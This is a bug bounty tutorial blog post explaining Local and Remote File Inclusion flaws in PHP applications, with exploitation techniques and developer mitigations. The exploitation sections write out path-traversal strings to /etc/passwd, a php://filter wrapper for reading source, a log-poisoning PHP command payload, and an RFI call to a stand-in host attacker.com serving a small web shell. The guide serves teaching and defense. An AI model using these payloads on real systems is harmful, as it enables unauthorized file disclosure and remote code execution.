File Inclusion Vulnerabilities for Bug Bounty: From Basics to Real-World Exploitation

December 27, 2025 • 4 min read

A complete beginner-to-advanced guide on Local File Inclusion (LFI) and Remote File Inclusion (RFI), covering how they work, real-world exploitation techniques, and how developers should properly mitigate them.

Disclaimer

This article is written strictly for educational and defensive security purposes.
All techniques discussed must only be tested on applications you own or where you have explicit permission (such as authorized bug bounty programs).

Do not test these techniques on random websites. Unauthorized testing is illegal.

Introduction

File Inclusion vulnerabilities are among the oldest yet still relevant classes of web application flaws. Despite being well-documented for decades, they continue to appear in modern applications-especially in legacy code, custom frameworks, and poorly reviewed features.

For bug bounty hunters, LFI and RFI are high-signal vulnerabilities:

They often lead to sensitive data exposure
They can escalate into Remote Code Execution (RCE)
They are frequently underestimated or overlooked

This blog walks through file inclusion vulnerabilities from absolute basics to practical exploitation, with a clear bug bounty mindset.

What Are File Inclusion Vulnerabilities?

File Inclusion vulnerabilities occur when a web application dynamically loads files based on user-controlled input, without sufficient validation.

Internally, the application may use functions such as:

include()
require()
include_once()
require_once()

When user input is passed directly into these functions, attackers can manipulate file paths to include unintended files.

There are two major categories:

Local File Inclusion (LFI) - including files already present on the server
Remote File Inclusion (RFI) - including files hosted on an external server

Local File Inclusion (LFI)

What Is LFI?

Local File Inclusion allows an attacker to read files that exist on the same server as the web application.

While LFI often starts as a read-only vulnerability, it can escalate into:

Credential disclosure
Source code leakage
Log poisoning → RCE
Session hijacking

How LFI Works (Simple Example)

Cyberpunk-themed technical diagram showing a holographic browser interface sending a malicious file parameter via a glowing data stream to a futuristic server, which then incorrectly includes sensitive local system files.

Consider this URL:

https://example.com/index.php?page=home.php

Internally, the application may be doing something like:

include($_GET['page']);

If the input is not sanitized, an attacker can manipulate the path:

https://example.com/index.php?page=/etc/passwd

If successful, the server responds with the contents of /etc/passwd.

Why `/etc/passwd` Is Used

It exists on almost all Linux systems
It is world-readable
It confirms file read capability without breaking the app

This makes it a safe proof-of-concept for reporting.

Common LFI Exploitation Techniques

1. Path Traversal

A visualization in a cyberpunk style showing a digital directory structure as glowing stacked layers, where the '../' sequence is depicted as a hacking tool breaking out of the intended 'webroot' containment layer to access restricted levels.

Attackers traverse directories using ../:

../../../../etc/passwd

Applications sometimes block simple traversal, so attackers try variations:

....//....//etc/passwd
..%2f..%2fetc%2fpasswd

2. LFI via PHP Wrappers

PHP provides stream wrappers that are frequently abused.

Example:

php://filter/convert.base64-encode/resource=index.php

This allows attackers to:

Read PHP source code
Bypass output restrictions
Avoid code execution

3. LFI with Log Poisoning

A three-step cyberpunk illustration showing: 1) Injecting malicious PHP code into a glowing server log file. 2) The server including the poisoned log via LFI. 3) A visual representation of code execution and system compromise with neon glitch effects.

This is where LFI becomes dangerous.

Step 1: Inject PHP into logs

Send a request with a malicious User-Agent:

<?php system($_GET['cmd']); ?>

Web servers log this value.

Step 2: Include the log file

https://example.com/index.php?page=/var/log/apache2/access.log&cmd=id

If successful, the injected PHP executes.

Remote File Inclusion (RFI)

Cyberpunk diagram showing a vulnerable web server establishing a connection across a digital network to a rogue, attacker-controlled server to fetch and execute a malicious remote PHP script, visualized with dark neon colors.

What Is RFI?

Remote File Inclusion allows attackers to include and execute files hosted on external servers.

RFI is generally more severe than LFI because it often leads directly to Remote Code Execution.

How RFI Works

Example vulnerable code:

include($_GET['page']);

Attacker payload:

https://example.com/index.php?page=http://attacker.com/evil.php

If allow_url_include is enabled, the server fetches and executes the remote file.

Typical RFI Payload

Remote file (evil.php):

<?php
echo "<pre>";
system($_GET['cmd']);
echo "</pre>";
?>

Execution:

https://example.com/index.php?page=http://attacker.com/evil.php&cmd=id

How to Identify File Inclusion Vulnerabilities (Bug Bounty Methodology)

1. Parameter Discovery

Look for parameters like:

page
file
include
template
path
lang
view

These are high-risk indicators.

2. Black-Box Testing

Without source code:

Try /etc/passwd
Try traversal sequences
Observe error messages
Watch for response length changes

3. Source Code Review (If Available)

Search for:

include($_GET[…])
require($_REQUEST[…])

Check if allowlists or sanitization exist.

4. Controlled RFI Testing

Only in authorized environments:

Use harmless payloads like phpinfo()
Never deploy destructive shells

Real-World Bug Bounty Impact

File inclusion bugs often lead to:

Database credential leaks
Environment variable exposure
Full server compromise
Pivoting to internal services

Many high-severity bounties start as a “simple LFI”.

Mitigation Strategies (For Developers)

Cyberpunk illustration of a secure digital gateway representing an allowlist, permitting only verified, glowing blue file paths to pass while actively blocking and destroying malicious red attacker-controlled paths.

1. Never Trust User Input

Do not pass user input directly into file system functions.

2. Use Allow-Lists

Instead of:

include($_GET['page']);

Use:

$allowed = ['home', 'about'];
if (in_array($_GET['page'], $allowed)) {
  include($_GET['page'] . '.php');
}

3. Disable Dangerous PHP Settings

allow_url_include = Off
allow_url_fopen = Off (when possible)

4. Proper File Permissions

Logs should not be executable
Sensitive files should not be web-accessible

5. Centralized Input Validation

Normalize paths and reject traversal patterns before processing.

Key Takeaways for Bug Hunters

LFI is often underestimated but highly impactful
Start with read-only proofs, then think about escalation
Logs, backups, and config files are goldmines
Old vulnerabilities still pay well when found responsibly

Conclusion

File Inclusion vulnerabilities are a perfect example of “simple input, catastrophic impact.”

They reward:

Careful observation
Patience
Understanding of backend behavior

Whether you are a beginner bug hunter or an experienced researcher, mastering LFI and RFI is a must-have skill.

References

OWASP File Inclusion Cheat Sheet
CWE-98: Improper Control of Filename for Include/Require
PortSwigger Web Security Academy - File Path Traversal
PHP Manual - include() and require()